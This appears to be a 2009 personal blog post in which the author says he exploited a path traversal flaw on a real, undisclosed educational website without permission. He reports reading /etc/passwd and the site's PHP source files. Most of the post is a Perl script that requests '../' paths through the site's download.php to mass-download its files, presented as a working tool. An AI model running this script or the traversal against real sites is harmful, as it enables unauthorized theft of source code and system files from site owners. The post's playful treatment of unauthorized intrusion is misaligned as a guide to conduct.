«
»

Script source code disclosure could mean full compromising

Hello,

I have been playing lately with some websites security since it was extremely bored for me after finishing my exams to have nothing better to do.. yeah I know I still got to finish the CCNA course and get over with that but call me lazy I’ve wasted alot of valuable time :-(

Never mind that for a second, what I bring to you today is a closer look on websites security and what could a simple human error do with your website.

Take for example our website today, http://vulnerable.edu.xx [Link kept private for.. well, I might have some black hat touch here but I still don't want anyone to compromise the website for fun! as we all know, it was always for "educational purposes only" :D ] — the website appeared to be vulnerable to Script source code disclosure which entitled me to have a copy of every single file on the website that appeared on my crawler, including the famous ‘passwd‘ file [unfortunately the passwords were kept encrypted in the 'shadow' file :( -- wasn't hard to guess the path once I got the ability to get any file :) ]

So with a fast dirty perl code I wrote on a rush (took me about half an hour to learn some basics) I managed to download a copy of my beloved PHP files that were located on that host :) 

use LWP 5.64;
use strict;
use File::Basename;

my $browser = LWP::UserAgent->new;

open (handle, 'files.txt');
mkdir "site";
chdir "./site";
while (< handle >) { #remove the spaces between handle and <>, WP parser sucks
    chomp;
    my ($filename,$directories) = fileparse("$_");
    my @dir = split('/',$directories);
    my $i = 0;
    while (@dir[$i]) {
        mkdir @dir[$i];
        chdir './'.@dir[$i];
        $i = $i + 1;
    }
    $i = $i - 1;

    my $url = 'http://vulnerable.edu.xx/common/download.php?'
    $url .= 'fileName=../' . $directories . $filename;
    print "working on " . $url ."\n";

    my $response = $browser->get($url);
    die "Can't get $url -- ", $response->status_line
    unless $response->is_success;
    die "Hey I was expecting PHP, not ", $response->content_type
    unless $response->content_type eq 'application/download';

    open (file, '>'.$filename) or die "Can't create file '$filename'";
    print file $response->content;
    close(file);

    print "saving " . $directories . $filename . "\n";

    for ($i; $i >= 0; $i--) {
        chdir('../');
    }
}
just an example, one of the folders :)

just an example, one of the folders :)

let’s hope it’s not your site :D

This entry was posted on February 18, 2009 at 9:55 am and is filed under Programming, Security with tags , , , . You can follow any responses to this entry through the RSS 2.0 feed You can leave a response, or trackback from your own site.

Leave a Reply